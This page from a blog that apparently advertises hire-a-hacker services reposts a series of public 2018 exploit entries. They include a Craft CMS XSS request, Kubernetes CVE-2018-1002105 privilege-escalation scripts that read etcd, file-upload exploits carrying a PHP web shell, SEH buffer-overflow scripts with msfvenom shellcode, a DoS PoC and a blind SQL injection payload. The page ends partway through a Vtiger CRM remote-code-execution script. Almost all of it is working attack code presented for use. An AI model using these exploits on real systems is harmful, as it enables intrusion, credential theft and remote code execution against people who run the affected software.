Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863588078

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Craft CMS 3.0.25 - Cross-Site Scripting
# Google Dork: N/A
# Date: 2018-12-20
# Exploit Author: Raif Berkay Dincel
# Contact: www.raifberkaydincel.com
# More Details [1] : https://www.raifberkaydincel.com/craft-cms-3-0-25-cross-site-scripting-vulnerability.html
# More Details [2] : https://github.com/rdincel1/Craft-CMS-3.0.25---Cross-Site-Scripting/blob/master/README.md
# Vendor Homepage: craftcms.com 
# Vulnerable Software --> [ https://github.com/rdincel1/Craft-CMS-3.0.25---Cross-Site-Scripting/raw/master/Craft-3.0.25.rar ] 
# Affected Version: [ 3.0.25 ]
# CVE-ID: CVE-2018-20418
# Tested on: Kali Linux / Linux Mint / Windows 10
 
# Vulnerable Parameter Type: POST 
# Vulnerable Parameter: http://127.0.0.1/admin-panel-path/index.php?p=admin/actions/entries/save-entry
# Attack Pattern: <script>alert("Raif_Berkay")</script> 
 
# Description
 
Allows it to run a Cross-Site Scripting by saving a new title from the console tab.
 
# Proof of Concepts:
 
POST /admin-panel-path/index.php?p=admin/actions/entries/save-entry HTTP/1.1
Host: IP:PORT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Registered-Asset-Bundles: ,craft\web\assets\quickpost\QuickPostAsset,craft\web\assets\cp\CpAsset,craft\web\assets\d3\D3Asset,craft\web\assets\elementresizedetector\ElementResizeDetectorAsset,craft\web\assets\garnish\GarnishAsset,yii\web\JqueryAsset,craft\web\assets\jquerytouchevents\JqueryTouchEventsAsset,craft\web\assets\velocity\VelocityAsset,craft\web\assets\jqueryui\JqueryUiAsset,craft\web\assets\jquerypayment\JqueryPaymentAsset,craft\web\assets\datepickeri18n\DatepickerI18nAsset,craft\web\assets\picturefill\PicturefillAsset,craft\web\assets\selectize\SelectizeAsset,craft\web\assets\fileupload\FileUploadAsset,craft\web\assets\xregexp\XregexpAsset,craft\web\assets\fabric\FabricAsset,craft\web\assets\prismjs\PrismJsAsset,craft\redactor\assets\field\FieldAsset,craft\redactor\assets\redactor\RedactorAsset,IP:PORT/admin-panel-path/cpresources/699311eb/fullscreen.js,IP:PORT/admin-panel-path/cpresources/5ec6eb0d/video.js,craft\web\assets\matrix\MatrixAsset,craft\web\assets\recententries\RecentEntriesAsset,craft\web\assets\feed\FeedAsset,craft\web\assets\dashboard\DashboardAsset
X-Registered-Js-Files: ,IP:PORT/admin-panel-path/cpresources/210842f9/d3.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/8c97f5da/element-resize-detector.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/a3075e2f/jquery.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/28095e6a/jquery.mobile-events.min.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/b288a952/velocity.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/12b5557f/garnish.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/fc2132f7/jquery-ui.min.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/aeaf06ba/jquery.payment.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/6270e830/datepicker-tr.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/2fad62a8/picturefill.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/7bd34f2c/selectize.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/37456356/jquery.fileupload.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/71bf0ba6/xregexp-all.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/7f38141/fabric.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/7dfc6a65/js/Craft.min.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/92be564/QuickPostWidget.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/2a8f54e3/prism.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/d443ac9b/redactor.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/d443ac9b/lang/tr.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/PluginBase.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftAssetImageEditor.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftAssetImages.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftAssetFiles.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftEntryLinks.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/RedactorInput.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/RedactorOverrides.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/699311eb/fullscreen.js,IP:PORT/admin-panel-path/cpresources/5ec6eb0d/video.js,IP:PORT/admin-panel-path/cpresources/2fd586d6/MatrixInput.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/5938f19a/RecentEntriesWidget.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/ff3b78b9/FeedWidget.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/86785e72/Dashboard.min.js?v=1545257412
X-CSRF-Token: 3DfArizwnHjDchbSztLrD2y9nzm5ZkSF2zukx2PZ3i6suVVTRScwwqtvPKqGXYiVZW1POc8cGtXlnjRfrfplCa1kg6nfVMOwm6fPN3BvkYrtM5QsDEV3dYhbSN1lBW6wFSNfiReM9Q3nAb9ut55USDtdUvokmt1DCs4AOm9Y0Ue1Gx1cmGd1Rzy0v3qTP3MsTi9z4tNJEVFdFMBCFtcEgKxH00WYzD8GdZk2aDlHVJHrMHOLTYzf1SzY2dJlO9ifBT0ZJcJNkvQk83bcygPe64lHjeBls_0-qCtA66-Qmz8L79Jw3QRysr5UkIEis6ZWmtAUCg9ufY_XDgrJ4D6xoV1Udw6pKny00KkAaszDUzyVXbrLuzWn063CqwRIDPS6jgr2Hjl8ERbpOinsVzELgiAbO7pxvJM00FTPI_nXFyl9NgusHfufMzqpUncmPLNxgn5yaN4mHz9EgtY7ynU6YQNTQp73e3B1bCfkd3zvZtP-KJgUwqVPbAHQUV5_HwPDxVs02R-_irNvlPeDAHaR6zdETXeKfLycZ70-kJtIqpo=
Content-Length: 857
Connection: close
Cookie: _ga=GA1.2.143638489.1545256652; _gid=GA1.2.362987822.1545256652; 1031b8c41dfff97a311a7ac99863bdc5_identity=3fe8168bce4c48f844d43d3855ef833d47ba56edc78686d732690216a40a7ee6a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_identity%22%3Bi%3A1%3Bs%3A243%3A%22%5B%221%22%2C%22%5B%5C%226wiT39UWdaEONl4iVMf6YZKo0TXsitqlapyaB4s1w9PJxkC3lUIyQsTP12pW0NLCU03hRa_X8SAglzpjlTUJh47RcOcmjgBQE9uO%5C%22%2C%5C%2212a6fb6b-eb72-44c3-b890-6c71b8d2bb88%5C%22%2C%5C%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A64.0%29+Gecko%2F20100101+Firefox%2F64.0%5C%22%5D%22%2C3600%5D%22%3B%7D; 1031b8c41dfff97a311a7ac99863bdc5_username=2365234bf6c8d0bafa98169137b93dc9e6af973d5135b3f0dd94d23d71c923d2a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; CraftSessionId=asetaditigin2tb5uerlivl8h7; CRAFT_CSRF_TOKEN=f4c4ded0838271c4ba50e1e2953119ff3b266d2cedaeba1984823672a14f6e71a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A208%3A%22UpMNICaFkYV9aBp0gRMIdb67eo4FAjxx6iAYJIMM%7Ca6cfc948987f6fa5745a965899bdadc6ed38ce0c9b259fcaaa124e258d3f0f97UpMNICaFkYV9aBp0gRMIdb67eo4FAjxx6iAYJIMM%7C1%7C%242a%2413%245j8bSRoKQZipjtIg6FXWR.kGRR3UfCL.QeMIt2yTRH1.hCNHLQKtq%22%3B%7D; _gat=1
Cache-Control: no-transform
 
enabled=1&fieldsLocation=fields1428173416&CRAFT_CSRF_TOKEN=3DfArizwnHjDchbSztLrD2y9nzm5ZkSF2zukx2PZ3i6suVVTRScwwqtvPKqGXYiVZW1POc8cGtXlnjRfrfplCa1kg6nfVMOwm6fPN3BvkYrtM5QsDEV3dYhbSN1lBW6wFSNfiReM9Q3nAb9ut55USDtdUvokmt1DCs4AOm9Y0Ue1Gx1cmGd1Rzy0v3qTP3MsTi9z4tNJEVFdFMBCFtcEgKxH00WYzD8GdZk2aDlHVJHrMHOLTYzf1SzY2dJlO9ifBT0ZJcJNkvQk83bcygPe64lHjeBls_0-qCtA66-Qmz8L79Jw3QRysr5UkIEis6ZWmtAUCg9ufY_XDgrJ4D6xoV1Udw6pKny00KkAaszDUzyVXbrLuzWn063CqwRIDPS6jgr2Hjl8ERbpOinsVzELgiAbO7pxvJM00FTPI_nXFyl9NgusHfufMzqpUncmPLNxgn5yaN4mHz9EgtY7ynU6YQNTQp73e3B1bCfkd3zvZtP-KJgUwqVPbAHQUV5_HwPDxVs02R-_irNvlPeDAHaR6zdETXeKfLycZ70-kJtIqpo%3D&title=%3Cscript%3Ealert("Raif_XSS")%3C%2Fscript%3E&fields1428173416%5BfeaturedImage%5D=&fields1428173416%5BshortDescription%5D=&fields1428173416%5Bheading%5D=&fields1428173416%5Bsubheading%5D=&fields1428173416%5BarticleBody%5D=&sectionId=2&typeId=2
HireHackking 
#!/usr/bin/env python3
import argparse
from ssl import wrap_socket
from socket import create_connection
from secrets import base64, token_bytes


def request_stage_1(namespace, pod, method, target, token):

    stage_1 = ""

    with open('stage_1', 'r') as stage_1_fd:
        stage_1 = stage_1_fd.read()

    return stage_1.format(namespace, pod, method, target,
                          token).encode('utf-8')


def request_stage_2(target, namespace, pod, container, command):

    stage_2 = ""

    command = f"command={'&command='.join(command.split(' '))}"

    with open('stage_2', 'r') as stage_2_fd:
        stage_2 = stage_2_fd.read()

    key = base64.b64encode(token_bytes(20)).decode('utf-8')

    return stage_2.format(namespace, pod, container, command,
                          target, key).encode('utf-8')


def run_exploit(target, stage_1, stage_2, method, filename, ppod,
                container):

    host, port = target.split(':')

    with create_connection((host, port)) as sock:

        with wrap_socket(sock) as ssock:
            print(f"[*] Building pipe using {method}...")
            ssock.send(stage_1)

            if b'400 Bad Request' in ssock.recv(4096):
                print('[+] Pipe opened :D')

            else:
                print('[-] Not sure if this went well...')

            print(f"[*] Attempting code exec on {ppod}/{container}")
            ssock.send(stage_2)

            if b'HTTP/1.1 101 Switching Protocols' not in ssock.recv(4096):
                print('[-] Exploit failed :(')

                return False

            data_incoming = True

            data = []

            while data_incoming:
                data_in = ssock.recv(4096)
                data.append(data_in)

                if not data_in:
                    data_incoming = False

            if filename:
                print(f"[*] Writing output to {filename} ....")

                with open(filename, 'wb+') as fd:
                    for msg in data:
                        fd.write(msg)

                    print('[+] Done!')

            else:
                print(''.join(msg.decode('unicode-escape')
                              for msg in data))


def main():

    parser = argparse.ArgumentParser(description='PoC for CVE-2018-1002105.')

    required = parser.add_argument_group('required arguments')
    optional = parser.add_argument_group('optional arguments')

    required.add_argument('--target', '-t', dest='target', type=str,
                          help='API server target:port', required=True)
    required.add_argument('--jwt', '-j', dest='token', type=str,
                          help='JWT token for service account', required=True)
    required.add_argument('--namespace', '-n', dest='namespace', type=str,
                          help='Namespace with method access',
                          default='default')
    required.add_argument('--pod', '-p', dest='pod', type=str,
                          required=True, help='Pod with method access')
    required.add_argument('--method', '-m', dest='method', choices=['exec',
                          'portforward', 'attach'], required=True)

    optional.add_argument('--privileged-namespace', '-s', dest='pnamespace',
                          help='Target namespace', default='kube-system')
    optional.add_argument('--privileged-pod', '-e', dest='ppod', type=str,
                          help='Target privileged pod',
                          default='etcd-kubernetes')
    optional.add_argument('--container', '-c', dest='container', type=str,
                          help='Target container', default='etcd')
    optional.add_argument('--command', '-x', dest='command', type=str,
                          help='Command to execute',
                          default='/bin/cat /var/lib/etcd/member/snap/db')
    optional.add_argument('--filename', '-f', dest='filename', type=str,
                          help='File to save output to', default=False)

    args = parser.parse_args()

    if args.target.find(':') == -1:
        print(f"[-] invalid target {args.target}")
        return False

    stage1 = request_stage_1(args.namespace, args.pod, args.method, args.target,
                             args.token)
    stage2 = request_stage_2(args.target, args.pnamespace, args.ppod,
                             args.container, args.command)

    run_exploit(args.target, stage1, stage2, args.method, args.filename,
                args.ppod, args.container)


if __name__ == '__main__':
    main()
HireHackking 
#!/usr/bin/env python3
import argparse
from ssl import wrap_socket
from json import loads, dumps
from socket import create_connection


def request_stage_1(base, version, target):

    stage_1 = ""

    with open('ustage_1', 'r') as stage_1_fd:
        stage_1 = stage_1_fd.read()

    return stage_1.format(base, version, target
                          ).encode('utf-8')


def request_stage_2(base, version, target_api, target):

    stage_2 = ""

    with open('ustage_2', 'r') as stage_2_fd:
        stage_2 = stage_2_fd.read()

    return stage_2.format(base, version, target_api, target,
                          ).encode('utf-8')


def read_data(ssock):

    data = []
    data_incoming = True

    while data_incoming:
        data_in = ssock.recv(4096)

        if not data_in:
            data_incoming = False

        elif data_in.find(b'\n\r\n0\r\n\r\n') != -1:
            data_incoming = False

        offset_1 = data_in.find(b'{')
        offset_2 = data_in.find(b'}\n')

        if offset_1 != -1 and offset_2 != -1:
            data_in = data_in[offset_1-1:offset_2+1]

        elif offset_1 != -1:
            data_in = data_in[offset_1-1:]

        elif offset_2 != -1:
            data_in = data_in[:offset_2-1]

        data.append(data_in)

    return data


def run_exploit(target, stage_1, stage_2, filename, json):

    host, port = target.split(':')

    with create_connection((host, port)) as sock:

        with wrap_socket(sock) as ssock:
            print('[*] Building pipe ...')
            ssock.send(stage_1)

            data_in = ssock.recv(15)

            if b'HTTP/1.1 200 OK' in data_in:
                print('[+] Pipe opened :D')
                read_data(ssock)

            else:
                print('[-] Not sure if this went well...')

            print(f"[*] Attempting to access url")

            ssock.send(stage_2)
            data_in = ssock.recv(15)

            if b'HTTP/1.1 200 OK' in data_in:
                print('[+] Pipe opened :D')

            data = read_data(ssock)

            return data


def parse_output(data, json, filename):

    if json:
        j = loads(''.join(i.decode('utf-8')
                          for i in data))

        data = dumps(j, indent=4)

        if filename:
            mode = 'w+'

        else:
            mode = 'wb+'

    if filename:
        print(f"[*] Writing output to {filename} ....")

        with open(filename, mode) as fd:
            if json:
                fd.write(data)

            else:
                for msg in data:
                    fd.write(msg)

            print('[+] Done!')

    else:
        if json:
            print(data)

        else:
            print(''.join(msg.decode('unicode_escape') for msg in data))


def main():

    parser = argparse.ArgumentParser(description='Unauthenticated PoC for'
                                                 ' CVE-2018-1002105')
    required = parser.add_argument_group('required arguments')
    optional = parser.add_argument_group('optional arguments')

    required.add_argument('--target', '-t', dest='target', type=str,
                          help='API server target:port', required=True)
    required.add_argument('--api-base', '-b', dest='base', type=str,
                          help='Target API name i.e. "servicecatalog.k8s.io"',
                          default="servicecatalog.k8s.io")
    required.add_argument('--api-target', '-u', dest='target_api', type=str,
                          help='API to access i.e. "clusterservicebrokers"',
                          default="clusterservicebrokers")

    optional.add_argument('--api-version', '-a', dest='version', type=str,
                          help='API version to use i.e. "v1beta1"',
                          default="v1beta1")
    optional.add_argument('--json', '-j', dest='json', action='store_true',
                          help='Print json output', default=False)
    optional.add_argument('--filename', '-f', dest='filename', type=str,
                          help='File to save output to', default=False)

    args = parser.parse_args()

    if args.target.find(':') == -1:
        print("f[-] invalid target {args.target}")
        return False

    stage1 = request_stage_1(args.base, args.version, args.target)

    stage2 = request_stage_2(args.base, args.version, args.target_api,
                             args.target)

    output = run_exploit(args.target, stage1, stage2, args.filename, args.json)

    parse_output(output, args.json, args.filename)


if __name__ == '__main__':
    main()
HireHackking 
# Exploit Title: WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload
# Date: 2018-12-24
# Software Link: https://wordpress.org/plugins/baggage-freight/
# Exploit Author: Kaimi
# Website: https://kaimi.io
# Version: 0.1.0
# Category: webapps

# Unrestricted file upload for unahtorized user in package info upload 
# process allowing arbitrary extension.

File: upload-package.php

Vulnerable code:
if($_POST["submit"])
{
    if ($_FILES["file"])
    {
        $uploadpath = "../wp-content/plugins/baggage_shipping/upload/".time()."_".$_FILES["file"]["name"];

        move_uploaded_file($_FILES["file"]["tmp_name"],$uploadpath);

# Exploitation example:

POST /wp-content/plugins/baggage-freight/upload-package.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------18311719029180117571501079851
...
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="submit"

1
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="file"; filename="file.php"
Content-Type: audio/wav

<?php phpinfo();
-----------------------------18311719029180117571501079851--

# Uploaded file will be located at /wp-content/plugins/baggage_shipping/upload/{timestamp}_info.php.
HireHackking 
# Exploit Title: bludit Pages Editor 3.0.0 - Arbitrary File Upload 
# Date: 2018-10-02
# Google Dork: N/A
# Exploit Author: BouSalman
# Vendor Homepage: https://www.bludit.com/
# Software Link: N/A
# Version: 3.0.0
# Tested on: Ubuntu 18.04
# CVE : 2018-1000811

POST /admin/ajax/upload-files HTTP/1.1
Host: 192.168.140.154
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.140.154/admin/new-content
X-Requested-With: XMLHttpRequest
Content-Length: 415
Content-Type: multipart/form-data; boundary=---------------------------26228568510541774541866388118
Cookie: BLUDIT-KEY=5s634f6up72tmfi050i4okunf9
Connection: close

-----------------------------26228568510541774541866388118
Content-Disposition: form-data; name="tokenCSRF"

67987ea926223b28949695d6936191d28d320f20
-----------------------------26228568510541774541866388118
Content-Disposition: form-data; name="bluditInputFiles[]"; filename="poc.php"
Content-Type: image/png

<?php system($_GET["cmd"]);?>

-----------------------------26228568510541774541866388118--
HireHackking 
# Exploit Title: Iperius Backup 5.8.1 - Buffer Overflow (SEH)
# Date: 2018-12-26
# Exploit Author: bzyo
# Twitter: @bzyo_
# Vulnerable Software: Iperius Backup 5.8.1
# Vendor Homepage: https://www.iperiusbackup.com
# Version: 5.8.1 Local Buffer Overflow (SEH Unicode)
# Software Link: https://www.iperiusbackup.com/download.aspx?v=free
# Tested Windows 7 SP1 x86

# PoC
# 1. run script
# 2. open app and create backup job
# 3. on other processes tab, select 'run a program or open external file'
# 4. copy/paste iperius.txt contents into file location
# 5. select ok to complete creating backup job
# 6. run backup job
# 7. app crashes; pop calc

#!/usr/bin/python

filename="iperius.txt"

junk = "\x71" * 306

#popad
nseh = "\x61\x62"

#0x005b004a
#pop esi # pop ebx # ret  | startnull,unicode,asciiprint,ascii Iperius.exe
seh = "\x4a\x5b"

valign = (
"\x53" 					#push ebx
"\x47" 					#align
"\x58" 					#pop eax
"\x47" 					#align
"\x05\x12\x01" 	                        #add eax,200 
"\x47"					#align
"\x2d\x11\x01"	                        #sub eax,100
"\x47"					#align
"\x50"					#push eax
"\x47"					#align
"\xc3"					#retn
)

#509 bytes
#msfvenom -p windows/exec CMD=calc -e x86/unicode_upper BufferRegister=EAX
calc = (
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AI"
"AJQI1AYAZBABABABAB30APB944JBKLZH4BM0M0KPS0SYIUP1Y01TTKR0NP4K1BLLDK0RN4DK42O8LOH70JMV01KO6LOL31SLKRNLO0"
"7QHOLMM17WK2L21B1GDKQBN04KOZOLDKPLN148ZC18KQJ121TKB9O0KQ9C4K0IN8ZCOJQ9TK04TKM1YF01KOVL7QXOLMM1GWNXK045"
"ZVLC3ML8OK3MO43EZDQHTKR8O4M1XS2FDKLLPK4KB8MLKQJ3TKKTTKM1XPCYOTMTO41K1K310YPZ21KOIPQOQOPZDKN2ZKDMQM1ZM1"
"TMU582KPKPKP201XNQ4KRODGKOXU7KZP7EVB26BH76TUGMUMKOXUOLLFCLKZSPKK9PD5KU7K0GN33BBO1ZM01CKOXUQS1QBL33M0AA")

nops = "\x71"*109

fill = "\x71"*1000

buffer = junk + nseh + seh + valign + nops + calc + fill
  
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
HireHackking 
# Exploit Title: Terminal Services Manager 3.1 - Buffer Overflow (SEH)
# Date: 2018-12-25
# Exploit Author: bzyo
# Twitter: @bzyo_
# Vulnerable Software: Terminal Services Manager 3.1
# Vendor Homepage: https://lizardsystems.com
# Version: 3.1 
# Software Link: https://lizardsystems.com/download/tsmanager_setup.exe
# Tested Windows 7 SP1 x86

# Other affected software from the vendor
# Software Link: https://lizardsystems.com/download/rpexplorer_setup.exe
# Software Link: https://lizardsystems.com/download/rshutdown_setup.exe
# Software Link: https://lizardsystems.com/download/rdaudit_setup.exe

# PoC
# 1. run script
# 2. run add computers wizard
# 3. select import from files
# 4. paste tsmang.txt into computer names field
# 5. pop calc

#bad chars \x00\x0d\x0e

#!/usr/bin/python

import struct

junk2 = "A"*100
junk1 = "B"*74
jmp2 = "\xe9\x71\xfe\xff\xff\xcc"
jmp1 = "\xeb\xf8\xcc\xcc"

#0x0049709f : pop esi # pop ebx # ret  tsmanager.exe
seh = struct.pack('<L',0x0049709f)

#Payload size: 220 bytes
#msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0d\x0e" -f python
calc =  ""
calc += "\xdb\xcd\xd9\x74\x24\xf4\x5a\x2b\xc9\xbe\xbb\x1e\xdd"
calc += "\x8e\xb1\x31\x31\x72\x18\x83\xc2\x04\x03\x72\xaf\xfc"
calc += "\x28\x72\x27\x82\xd3\x8b\xb7\xe3\x5a\x6e\x86\x23\x38"
calc += "\xfa\xb8\x93\x4a\xae\x34\x5f\x1e\x5b\xcf\x2d\xb7\x6c"
calc += "\x78\x9b\xe1\x43\x79\xb0\xd2\xc2\xf9\xcb\x06\x25\xc0"
calc += "\x03\x5b\x24\x05\x79\x96\x74\xde\xf5\x05\x69\x6b\x43"
calc += "\x96\x02\x27\x45\x9e\xf7\xff\x64\x8f\xa9\x74\x3f\x0f"
calc += "\x4b\x59\x4b\x06\x53\xbe\x76\xd0\xe8\x74\x0c\xe3\x38"
calc += "\x45\xed\x48\x05\x6a\x1c\x90\x41\x4c\xff\xe7\xbb\xaf"
calc += "\x82\xff\x7f\xd2\x58\x75\x64\x74\x2a\x2d\x40\x85\xff"
calc += "\xa8\x03\x89\xb4\xbf\x4c\x8d\x4b\x13\xe7\xa9\xc0\x92"
calc += "\x28\x38\x92\xb0\xec\x61\x40\xd8\xb5\xcf\x27\xe5\xa6"
calc += "\xb0\x98\x43\xac\x5c\xcc\xf9\xef\x0a\x13\x8f\x95\x78"
calc += "\x13\x8f\x95\x2c\x7c\xbe\x1e\xa3\xfb\x3f\xf5\x80\xf4"
calc += "\x75\x54\xa0\x9c\xd3\x0c\xf1\xc0\xe3\xfa\x35\xfd\x67"
calc += "\x0f\xc5\xfa\x78\x7a\xc0\x47\x3f\x96\xb8\xd8\xaa\x98"
calc += "\x6f\xd8\xfe\xfa\xee\x4a\x62\xd3\x95\xea\x01\x2b"

buffer = junk2 + calc + junk1 + jmp2 + jmp1 + seh

with open("tsmang.txt","wb") as f:
    f.write(buffer[:-1])
HireHackking 
# Exploit Title: Product Key Explorer 4.0.9 - Denial of Service (PoC)
# Date: 2018-12-25
# Exploit Author: T3jv1l
# Vendor Homepage: :http://www.nsauditor.com
# Software: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
# Contact: https://twitter.com/T3jv1l
# Version:  Product Key Explorer 4.0.9
# Tested on: Windows 7 SP1 x86

# Other affected software from the vendor
# Software: http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
# Software: http://www.nsauditor.com/downloads/apkf_setup.exe
# Software: http://www.nsauditor.com/downloads/officeproductkeyfinder_setup.exe
# Software: http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
# Software: http://www.nsauditor.com/downloads/spotmsn_setup.exe
# Software: http://www.nsauditor.com/downloads/spotie_setup.exe
# Software: http://www.nsauditor.com/downloads/spotftp_setup.exe
# Software: http://www.network-inventory-software.com/downloads/nhsi_setup.exe
# Software: http://www.nsauditor.com/downloads/nsi_setup.exe
# Software: http://www.nsauditor.com/downloads/blueauditor_setup.exe
# Software: http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Software: http://www.nsauditor.com/downloads/remshutdown_setup.exe
# Software: http://www.nsauditor.com/downloads/dnss_setup.exe

# PoC:
# 1.  Download and install the setup file
# 2.  A file "PoC.txt" will be created
# 3.  Click Help > Register... in tool bar
# 4.  Copy the contents of the file (PoC.txt) and paste in the Registration Key/Name field 
# 5.  Click OK and BOOMMMM !!!! 

#!/usr/bin/python

buffer = "\x41" * 2000
buffer += "\x42" * 2000
buffer += "\x43" * 1000

payload = buffer
try:
    f=open("PoC.txt","w")
    print "[+] Creating %s bytes payload..." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
HireHackking 
# Exploit Title: WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection
# Date: 2018-12-28
# Software Link: https://wordpress.org/plugins/adicons/
# Exploit Author: Kaimi
# Website: https://kaimi.io
# Version: 1.2
# Category: webapps

# SQL Injection
# File: addIcon.php
# Vulnerable code:
# $placement=$_POST['selectedPlace'];

# $x=explode("_",$placement);
# $ck=$wpdb->get_row("select id from ".$table_prefix."adicons where adRow=".$x[0]." and adCol=".$x[1]);

# Example payload:
selectedPlace=1 AND (SELECT * FROM (SELECT(SLEEP(1)))abcD); -- -
HireHackking 
# Exploit Title: Vtiger CRM 7.1.0 - Remote Code Execution
# Date: 2018-12-27
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://www.vtiger.com
# Software Link: https://sourceforge.net/projects/vtigercrm/files/latest/download
# Version: v7.1.0
# Category: Webapps
# Tested on: XAMPP for Linux 5.6.38-0
# Software Description : Vtiger CRM enables sales, support, and marketing teams to
# organize and collaborate to measurably improve customer experiences and business outcomes.

# Description : This application has the vulnerability of uploading files with the extension "php3" in the logo upload field.
# But the uploaded file must be in PNG format and size 150X40.
# We can put PHP code into image source. After you make the extension "php3", the PHP code that we've placed can work.
# Therefore, PHP code can be executed using "<? ?>" Tags in PNG format file.
# ==================================================================
# I have exploited in 2 different ways.
# First one uploads a basic php shell for you and lets you control it through the console.
# Second one uploads the php meterpreter payload to the target site and lets you set this payload.

# PoC:

#!/usr/bin/python
 
import mechanize, sys, cookielib, requests
import colorama, urllib, re, random
from colorama import Fore

def bannerche():
    print '''
 @-------------------------------------------------------------@
 |       Vtiger CRM 7.1.0 - Remote Code Execution Exploit      |
 |              Vulnerability discovered by AkkuS              |
 |               My Blog - https://pentest.com.tr              |
 @-------------------------------------------------------------@
          '''
bannerche()
 
if (len(sys.argv) != 2):
    print "[*] Usage: poc.py <RHOST>"
    exit(0)
 
rhost = sys.argv[1]
UserName = str(raw_input("User Name: ")) # Administrator Username Input
Password = str(raw_input("Password: "))  # Administrator Password Input
 
print(Fore.BLUE + "+ [*] Loging in...")
br = mechanize.Browser()                 # set cookies
br.set_handle_robots(False)
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
 
br.open("http://"+rhost+"/")             # User Access Login
assert br.viewing_html()
br.select_form(nr=0)
br.form['username'] = UserName
br.form['password'] = Password
br.submit()
 
title = br.title()
if title == "Dashboard":                 # Access control
   print (Fore.YELLOW + "+ [*] You're in "+title+" section of the app now")
   print (Fore.GREEN + "+ [*] Login successful")
else:
   print (Fore.RED + "+ [*] User information is incorrect.")
   sys.exit()
##
# Introducing Cookie and CSRF token information
##
check = requests.get("http://"+rhost+"/index.php?module=Vtiger&parent=Settings&view=CompanyDetails&block=8&fieldid=14", cookies=cj)

doc = check.text

finder = re.findall(r'csrfMagicToken = ".*";', doc)
csrf = finder[0].replace('csrfMagicToken = ', '').replace('"','').replace(';var csrfMagicName = __vtrftk;','').strip()
csrf_to_data = str(csrf)
print(Fore.YELLOW + "+ [*] Token = " + csrf_to_data)

x = br._ua_handlers['_cookies'].cookiejar
c = str(x)

sonuc = re.findall(r"([a-fA-F\d]{32})", c)
g = sonuc[0]
v = str(g)
print (Fore.YELLOW + "+ [*] PHPSESSID = " + v)
##
# Random value fetching
##

boundary = ''.join(str(random.randint(0,9)) for _ in xrange(29))
filename = ''.join(random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(10)) + ".php3"

##
# EXPLOIT
##
post_cookie = {"PHPSESSID": v}
post_headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                 "Accept-Language": "en-US,en;q=0.5",
                 "Connection": "close",
                 "Content-Type": "multipart/form-data; boundary=---------------------------"+boundary+""}
